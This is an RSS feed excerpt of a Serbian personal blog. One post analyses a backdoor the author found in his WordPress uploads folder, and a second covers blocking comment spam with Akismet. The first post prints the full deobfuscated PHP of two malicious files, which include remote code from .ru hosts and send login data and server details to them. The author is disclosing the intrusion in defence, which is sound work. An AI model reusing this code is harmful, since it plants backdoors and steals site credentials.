Avramov bRlog » zaštita http://blog.avramovic.info Web dnevnik Nemanje Avramovića Wed, 20 Apr 2011 10:10:29 +0000 en hourly 1 http://wordpress.org/?v=3.3.1 Backdoor na bRlogu? http://blog.avramovic.info/2008/09/11/backdoor-na-brlogu/ http://blog.avramovic.info/2008/09/11/backdoor-na-brlogu/#comments Thu, 11 Sep 2008 10:43:48 +0000 Avram http://blog.avramovic.info/?p=490

Upadnem malopre sasvim slučajno u svoj wp-contents/uploads/ folder, kad ima šta i da vidim tamo: Dva PHP fajla, jedan base.php i jedan create.php, kao i jedan .htaccess fajl koji usmerava sve 404 greške na create.php. Budem radoznao, otvorim ih kad ono “obfuscated” kod, odnosno nije toliko obfuscated koliko je sve napisano u jednom redu. Ne budem lenj, otvorim ih preko PHPEdit-a koji sam dobio ranije (i za koji sam još uvek dužan da napišem review), odradim ctrl+shift+f (code beautifier) i dobijem lepo ispisan kod:

base.php

  1. error_reporting(0);
  2. if (isset($_POST["l"]) and isset($_POST["p"])) {
  3.         if (isset($_POST["input"])) {
  4.                 $user_auth = "&l=" . base64_encode($_POST["l"]) . "&p=" . base64_encode(md5($_POST["p"]));
  5.         } else {
  6.                 $user_auth = "&l=" . $_POST["l"] . "&p=" . $_POST["p"];
  7.         }
  8. } else {
  9.         $user_auth = "";
  10. }
  11. if (!isset($_POST["log_flg"])) {
  12.         $log_flg = "&log";
  13. }
  14. if (!@include_once(base64_decode("aHR0cDovLw==") . "hegfzzazbzbcd" . base64_decode("LnVzZXJzLmJpc2hlbGwucnU=") . "/?r_addr=" . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) . "&url=" . base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) {
  15.         if ($_POST["l"] == "special") {
  16.                 print "sys_active" . `uname -a`;
  17.         }
  18. }

create.php

  1. error_reporting(0);
  2. $s = "e";
  3. $a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
  4. $b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
  5. $c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
  6. $d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
  7. $e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
  8. $f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
  9. $g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
  10. $h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
  11. $str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".$s";
  12. if ((include(base64_decode("aHR0cDovLw==") . "hegfzzazbzbcd" . base64_decode("LnVzZXJzLnBocGZyZWUucnU=") . "/?" . $str))) {
  13. } else {
  14.         include(base64_decode("aHR0cDovLw==") . "hegfzzazbzbcd" . base64_decode("LnVzZXJzLnBocGNvZGluZy5ydQ==") . "/?" . $str);
  15. }

Sve ovo što je base64_decode echo-ujem i vidim da je skripta napravljena da cross-site inkluduje u ovu skriptu štagod joj se prosledi sa http://hegfzzazbzbcd.users.phpfree.ru/, odnosno sa  http://hegfzzazbzbcd.users.phpcoding.ru ako ne uspe sa ove prve adrese – klasičan backdoor. Nemam pojma od kad to stoji na blogu, niti imam pojma otkud to kod mene u uploads/ folderu, i čudim se kako do sad bRlog nije deface-ovan, ali sad i da hoće neko preko toga da ga deface-uje – ne može, jer sam izbrisao skripte, i sprečio izvršavanje php skripti u uploads/ folderu.

A sad me izvin’te, odoh da proverim ostale blogove, što savetujem i vama. :-D

]]> http://blog.avramovic.info/2008/09/11/backdoor-na-brlogu/feed/ 17 Akismet čuva InterestingFacts http://blog.avramovic.info/2008/08/19/akismet-cuva-interestingfactsorg/ http://blog.avramovic.info/2008/08/19/akismet-cuva-interestingfactsorg/#comments Tue, 19 Aug 2008 00:47:13 +0000 Avram http://blog.avramovic.info/?p=412

Nije me bilo neko vreme… došao sam sa mora, nisam, naravno, pocrneo, jer ne volim sunčanje, i tako to… u principu me mrzi da sad prepričavam neke događaje, a par fotki imate kod mene na MySpace-u, pa ih možete videti tamo. Sve u svemu, bilo je lepo, nisam imao nikakvih problema u CG, obišao sam sve od Herceg Novog do Ade Bojane i super se proveo.

Međutim, kad sam se vratio zatekao sam preko 2000 SPAM komentara na InterestingFacts.org. Očigledno je ona CAPTCHA beskorisna (a kako i ne bi bila kad nema nikakvog deformisanja slike?)… note to myself – izbaci kepču. Nije mi bio problem da uklonim te spam komentare jer su se prilično šablonski pojavljivali, tako da sam sa pet-šest MySQL kverija očistio bazu od spama. Ali, problem je predstavljalo to što se spam botovi nikako nisu zaustavljali. Za dva dana sam skupljao po 2000 spam komentara. Poslednji talas je bio večeras kad sam par minuta posle čišćenja baze video desetak novih spam komentara u bazi. No, setih se Akismet-a kojim sam zaštitio ovaj i sve ostale blogove koje održavam, nađoh neku gotovu PHP klasu za Akismet i eto, od ovog jutra Akismet čuva Interesting Facts. Testirao sam ga sa normalnim komentarom i jednim “buy cheap viagra” komentarom, i pokazao se kao prilično uspešan. Takođe, nisam se mnogo trudio oko implementacije zaštite tako da se sumnjivi komentari ne zadržavaju za moderaciju već se odmah odbacuju. Ako budem saznao da dosta greši (mada po iskustvima sa WordPress-om – ne greši dosta) uvešću i tako nešto, no neću sada o tome.

Inače, juče sam prijavio tri ispita za septembarski rok i nadam se da ću naći vremena da ih spremim, ali kako je Instant Update 3 u završnoj fazi izrade (tačnije gotov je, treba ga samo spakovati za release)  a i Beer Fest nam se približava – teško.

]]> http://blog.avramovic.info/2008/08/19/akismet-cuva-interestingfactsorg/feed/ 0